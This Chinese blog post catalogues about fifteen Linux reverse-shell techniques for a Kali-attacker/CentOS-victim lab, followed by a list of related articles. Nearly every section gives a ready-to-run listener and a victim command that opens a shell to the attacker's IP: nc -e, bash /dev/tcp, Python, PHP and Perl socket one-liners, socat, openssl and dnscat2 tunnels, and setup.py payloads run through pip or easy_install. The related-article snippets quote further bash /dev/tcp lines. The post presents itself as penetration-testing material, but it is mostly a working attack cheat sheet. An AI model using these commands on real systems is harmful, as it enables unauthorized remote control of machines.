Linux多姿势反弹shell

最新推荐文章于 2026-05-08 11:10:49 发布
原创 最新推荐文章于 2026-05-08 11:10:49 发布 · 1.5k 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#linux #shell #bash #安全 #socket
本文详细介绍了在Linux环境下,通过nc、bash、telnet、whois、socat等多种工具进行反弹shell的方法,包括每种方法的攻击端和受害端操作,适用于安全研究和渗透测试场景。

前言

以下反弹shell的各种方法是小R收集到的,部分没有复现成功的方法没有放上来,待复现成功后会慢慢把文章完善,如有错误请帮忙指出。

演示环境:
攻击机:kali
受害机:CentOS7

1.Nc -e反弹

攻击端:

nc -lvp 23333

受害端:

nc -e /bin/bash 192.168.154.129 23333

在这里插入图片描述
在这里插入图片描述

2.Bash -i反弹

攻击端:

nc -lvp 23333

受害端:

bash -i >/dev/tcp/192.168.154.129/23333 0>&1 2>&1

(bash重定向到攻击机23333端口0和2表示标准输出和错误输出都重定向到攻击端。)
在这里插入图片描述
在这里插入图片描述

3.Telnet反弹(需安装telnet服务)

攻击端:

nc -lvp 23333

受害端:

telnet 192.168.154.129 23333 | /bin/bash | telnet 192.168.154.129
23334

在这里插入图片描述

第一个监听窗口执行命令:
在这里插入图片描述
第二个监听窗口回显:
在这里插入图片描述

4.Whois反弹

攻击端:

nc -lvp 23333

受害端:

whois -h 192.168.85.141 -p 23333 ‘whoami’

获得回显:
在这里插入图片描述

5.socat反弹

攻击端:

nc -lvp 23333

受害端:

socat exec:’bash -li’,pty,stderr,setsid,sigint,sane
tcp:192.168.154.129:23333

在这里插入图片描述
在这里插入图片描述

6.Python反弹

攻击端:

nc -lvp 23333

受害端:

Python -c “import
os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘192.168.154.129’,23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([’/bin/bash’,’-i’]);”

在这里插入图片描述
在这里插入图片描述

7.Php -r反弹

攻击端:

nc -lvp 23333

受害端:

php -r ‘$sock=fsockopen(“127.0.0.1”,23333);system("/bin/bash -i <&3 >&3 2>&3");’

(要先确认system函数在ini中是否被禁用)
在这里插入图片描述
在这里插入图片描述

8.Dnscat反弹

(基于DNS协议的通信工具,一般的通信工具基于TCP等的传输方式非常容易被防火墙拦截,但是dnscat2基于的DNS查询与响应报文一般不会被拦截,进而可以完成信息传输。)
DnsCat服务器的安装:

#git clone https://github.com/iagox86/dnscat2.git
#cd dnscat2
#cd server
#sudo gem install bundler
#bundle install
#sudo ruby./dnscat2.rb

在这里插入图片描述

客户端:

git clone https://github.com/iagox86/dnscat2 
cd dnscat2/client/ 
Make
./dnscat --dns server=192.168.2.101,port=53 --secret=706f8a6c1950ea305a82c9d6d873b958

会话建立:
在这里插入图片描述
列出所有通道

windows

在这里插入图片描述
进入客户端1通道

window -i 1

在这里插入图片描述
建立反弹shell

shell

在这里插入图片描述
退出当前通道,进入shell

suspend //表示退出当前通道
Windows
window -i 2//进入shell通道后,可按ctrl+z退出当前shell

在这里插入图片描述

9.Cpan反弹

CPAN是一支Perl程序的名字,其作用是让使用者容易从CPAN下载、安装、更新及管理其他在CPAN上的Perl程式。

攻击机监听:nc -lvp RPORT
受害机:

cpan
! use Socket; my $i="[攻击机IP]"; my $p=[攻击机端口]; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};

在这里插入图片描述
在这里插入图片描述

10.easy_install反弹

easy_install是由PEAK(Python Enterprise Application Kit)开发的setuptools包里带的一个命令,所以使用easy_install实际上是在调用setuptools来完成安装模块的工作。

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345

受害机:
export 的意思是定义全局变量。

export RHOST=192.168.85.141 export RPORT=12345 TF=$(mktemp -d) echo
‘import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")’ >
$TF/setup.py easy_install $TF

获得响应:
在这里插入图片描述

11.Gdb反弹

UNIX及UNIX-like下的调试工具。

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345

受害机:

export RHOST=192.168.85.141 export RPORT=12345 gdb -nx -ex ‘python
import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")’ -ex
quit

在这里插入图片描述

获得响应:
在这里插入图片描述

11.Ksh反弹

ksh 命令调用 Korn shell,这个 shell 是一个交互式的命令解释器和命令编程语言。这个 shell 可交互式的从终端键盘或从一个文件中执行命令。

攻击机:

nc -l -p 12345

受害机:

export RHOST=192.168.85.141
export RPORT=12345
ksh -c ‘ksh -i >/dev/tcp/$RHOST/$RPORT 2>&1 0>&1’
在这里插入图片描述

获得响应:
在这里插入图片描述

12.openssl 反弹

OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。

攻击机:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days
365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

在这里插入图片描述
在这里插入图片描述

受害机:

RHOST=192.168.85.141 RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s
2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s

在这里插入图片描述

获得响应:
在这里插入图片描述

13.Pip反弹

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.

受害机:

export RHOST=192.168.85.141 export RPORT=12345 TF=$(mktemp -d) echo
‘import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")’ >
$TF/setup.py pip install $TF
在这里插入图片描述

获得响应:
在这里插入图片描述

14.Rvim反弹

相当于vim
此方法需要python3环境

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345

受害机:

export RHOST=192.168.85.141 export RPORT=12345 rvim -c ‘:py import
vim,sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")
vim.command(":q!")’

在这里插入图片描述

获得响应:
在这里插入图片描述

15.Vim反弹

vim需要python3环境

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345
在这里插入图片描述

受害机:

export RHOST=192.168.85.141 export RPORT=12345 vim -c ‘:py import
vim,sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")
vim.command(":q!")’
在这里插入图片描述

获得响应:
在这里插入图片描述

反弹shell的各种姿势
08-12 2万+
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i &gt...
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 3万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
反弹shell汇总(超详细)
人无名,便可潜心练剑。
05-27 1万+
反弹shell姿势大全,看这一篇就够啦~
渗透测试技巧(四)| 反弹shell
最新发布
weixin_45689198的博客
05-08 564
这篇文章主要介绍了反弹Shell(Reverse Shell)的技术原理和种实现方法。反弹Shell是一种让目标机器主动连接攻击者机器以获取远程控制权限的网络攻击技术,是渗透测试中的重要技能。 文章详细列举了种实现反弹Shell的方式,包括: Bash反弹(通过/dev/tcp特殊设备建立socket连接) NC反弹(利用netcat工具建立连接) Telnet反弹(通过Telnet服务实现) Curl配合Bash或Python实现反弹 Socat命令反弹 OpenSSL加密反弹 使用编程语言(如Per
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 9839
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
反弹shell
weixin_39430198的博客
03-09 1万+
一、课时目标 1.理解shell的概念 2.理解交互式shell和非交互式shell的区别 3.掌握反弹shell的原理和方法
安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 7028
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash反弹的情况居,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
python反弹shell_反弹shell的各种姿势
weixin_39890543的博客
01-15 4022
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。Linux 反弹shell姿势一:bash反弹bash -i >& /dev...
Linux反弹shell姿势总结
她叫常玉莹
07-19 2868
Linux反弹shellBash反弹shellnc反弹shellpython反弹shellphp反弹shell使用php的exec函数反弹shell使用php的fsockopen远程连接Perl反弹shellRuby反弹shellJava反弹shell其他反弹shell姿势 Linux反弹shell场景非常常见,常用于目标主机反弹shell给攻击机。 攻击机监听相应端口,目标机执行反弹shell,getshellBash反弹shell 目标机: bash -i >& /dev/tcp/ip
反弹shell汇总,看我一篇就够了
LainWith的博客
12-26 2万+
反弹shell 知识铺垫 什么是shell shell是渗透中常用的名词,像getshell,webshell反弹shell等等,都和shell相关。 getshell:获取到目标的命令执行权限 webshell:指网站后门,通过web服务进行命令执行 反弹shell:把命令行的输入输出转移到其它主机 Shell 俗称壳(用来区别于核),是指“为使用者提供操作界面”的软件(命令解析器)。它类似于DOS下的command.com和后来的cmd.exe。它接收用户命令,然后调用相应的应用程序。简单说用户通
反弹shell方法汇总
2301_76786857的博客
01-10 2880
reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
反弹shell基础
m0_74849202的博客
04-30 1509
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标IP:目标机器端口),这是比较常规的形式,我们叫做正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。上面的常规方法有个问题,如果在webshell里执行如上代码的话,会把系统的标准输入输出重定向到/bin/sh里,导致php - fpm直接502,然后弹的shell也会瞬间掉了,这个方式比较粗鲁。
反弹Shell大全与原理
weixin_55652418的博客
01-02 2412
more反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
反弹shell的27种方法 都学会搞定90%的渗透!
2302_80351429的博客
01-05 2483
根据目标系统的环境和权限,攻击者可以编写自定义的反弹shell脚本。import oshost ='x.x.x.x'# 攻击者IPport =1234# 监听端口将此脚本上传到目标系统并执行,即可建立反弹shell连接。
常见的反弹shell的方法以及对反弹shell的解释
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
反弹Shell的方式和详解
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 7355
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
各种shell反弹方法
weixin_46626737的博客
05-16 3361
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
各种反弹shell方式
m0_58606546的博客
11-17 2461
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值